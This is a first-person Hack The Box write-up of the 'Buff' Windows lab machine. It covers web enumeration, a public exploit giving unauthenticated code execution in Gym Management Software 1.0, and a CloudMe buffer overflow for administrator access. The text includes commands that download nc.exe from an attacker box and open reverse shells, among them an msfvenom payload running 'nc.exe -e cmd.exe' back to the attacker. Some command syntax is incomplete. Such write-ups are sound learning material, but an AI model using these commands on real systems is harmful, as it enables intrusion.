HackTheBox – Buff

This is my first HackTheBox writeup, and I decided to write up on the “Buff” box that I did last month. It is a Windows OS machine with a difficulty of “Easy”, so it’s a good starting box for this series.

User Flag:

As always we want to start with an nmap scan to check for open ports/services. The “sV” flag is to scan for service versions:

The nmap scan indicates that the host may be blocking ping probes, so we add the “-Pn” flag to the command:

We see that port 8080 is open and is running an Apache web server. We can go ahead and visit that site at

Visiting the home page, it looks like a simple fitness website. The first set of actions I take when I discover a web site:

  1. Check all of the pages and their page soure’s for anything interesting
  2. Run a dirbuster scan to find any hidden directories.
  3. Test XSS and SQLi attacks on any input fields we find.
  4. Capture the requests with BurpSuite to see if we can extract any data or manipulate the requests for a possible exploit.

The login fields seemed to be properly sanitized, and the hidden files/directories didn’t lead me anywhere

While browsing the other pages of the site, I found an empty Contact page:

Definitely a suspicious find, and the only text on the page was “Made using Gym Management Software 1.0.” After a quick search on this on ExploitDB I found this:

According to the exploit, any website using the Gym Management System 1.0 could be vulnerable to unauthenticated remote code execution. It uses python 2, so you may have to run the exploit in a virtual environment if you’re having problems with python 3.

The latest version of kali already has this exploit in the exploitdb directory, so all you have to do is copy it to your working directory and run it!

$ cp /usr/share/exploitdb/exploits/php/webapps/48506.py/ .
$ python 48506.py

And just like that we have a web shell! The next things I always do when trying to escalate my privileges on a windows machine is to upload the “nc.exe” and “plink.exe” binaries found in the “windows-binaries” directory on your kali box. nc.exe is netcat which allows you to upgrade to a better shell, and plink is used to forward ports not directly reachable from outside of the machine.

Now we just need a way to get those binaries onto the victim machine. A really fast way to get this done is to setup a python simpleHTTPServer on your host that holds all of your binaries, and then download those binaries onto the victim machine with a web request command:

With the webshell we have just created, we can perform an Invoke-WebRequest command to download the binaries onto the victim machine:

C:\xampp\htdocs\gym\upload> Invoke-WebRequest -Uri [attacking box ip]/nc.exe -OutFile "nc.exe"

With netcat successfully downloaded onto the victim machine, we can run a listening netcat connection on our kali box to create a reverse shell:

Then, we run the nc.exe binary to connect back to our host machine with the nc.exe binary we just uploaded

C:\xampp\htdocs\gym\upload> nc [attacking box ip]:4444

If all done correctly, you should have a new shell, and should be able to use normal cmd/powershell commands. While traversing the system directories, I found the user shaun and the user Administrator. the access to Administrator was denied, but I could cd into shaun’s directory; the user flag is on his Desktop. As for the Administrator flag, we will have to dive deeper into the system to try to find something to exploit.

Administrator/Root Flag:

In the Download folder, there is an exe file named Cloudme1.11.2.exe that is running on a local port on the system. With a quick google search, I found that this file is vulnerable to Buffer Overflow. This is where the plink.exe comes in: we will forward the localport using cloudme to our host machine in order to exploit it with Buffer Overflow. Heres the metasploit payload I used:

msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe [attacking host ip]' -b '\x00\x0a\x0d'

After running that in a compiled executable, you will be able to connect to the victim machines as Administrator! Just traverse into Desktop folder and grab your flag!

Leave a Reply

Your email address will not be published. Required fields are marked *